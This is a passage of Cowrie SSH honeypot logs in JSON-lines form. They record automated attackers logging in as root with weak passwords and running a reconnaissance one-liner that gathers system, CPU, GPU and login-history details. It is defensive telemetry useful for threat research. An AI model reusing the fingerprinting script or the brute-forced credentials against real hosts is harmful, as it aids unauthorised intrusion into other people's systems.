/proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.664748Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.665388Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.666394Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.667466Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.668253Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.669030Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.669855Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.670520Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.671112Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.671667Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.672248Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:07:52.672732Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:07:53.212866Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:07:53.213845Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:07:53.214700Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":42948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b551e3af09b1","protocol":"ssh","message":"New connection: 196.251.86.249:42948 (1.2.3.4:22) [session: b551e3af09b1]","sensor":"my-vps","timestamp":"2025-08-26T09:08:51.878628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:08:52.325301Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:08:52.326161Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:08:54.243797Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:08:55.676659Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.677442Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.678332Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.679785Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.681535Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.682583Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.683511Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.684689Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.685450Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.686053Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.686635Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.687517Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:08:55.688382Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:08:56.246290Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:08:56.247408Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:08:56.248542Z","src_ip":"196.251.86.249","session":"b551e3af09b1"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":49518,"dst_ip":"1.2.3.4","dst_port":22,"session":"3376b7028665","protocol":"ssh","message":"New connection: 45.88.8.186:49518 (1.2.3.4:22) [session: 3376b7028665]","sensor":"my-vps","timestamp":"2025-08-26T09:09:42.378778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:09:42.963164Z","src_ip":"45.88.8.186","session":"3376b7028665"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:09:42.964158Z","src_ip":"45.88.8.186","session":"3376b7028665"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd@123","message":"login attempt [root/Passw0rd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:09:47.038076Z","src_ip":"45.88.8.186","session":"3376b7028665"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:09:48.083356Z","src_ip":"45.88.8.186","session":"3376b7028665"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":46648,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f5bcba1369","protocol":"ssh","message":"New connection: 196.251.86.249:46648 (1.2.3.4:22) [session: 70f5bcba1369]","sensor":"my-vps","timestamp":"2025-08-26T09:09:56.278052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:09:56.969420Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:09:56.970120Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:09:59.750446Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:10:00.994335Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:10:00.995206Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:10:00.995977Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:10:00.997796Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:10:00.999023Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
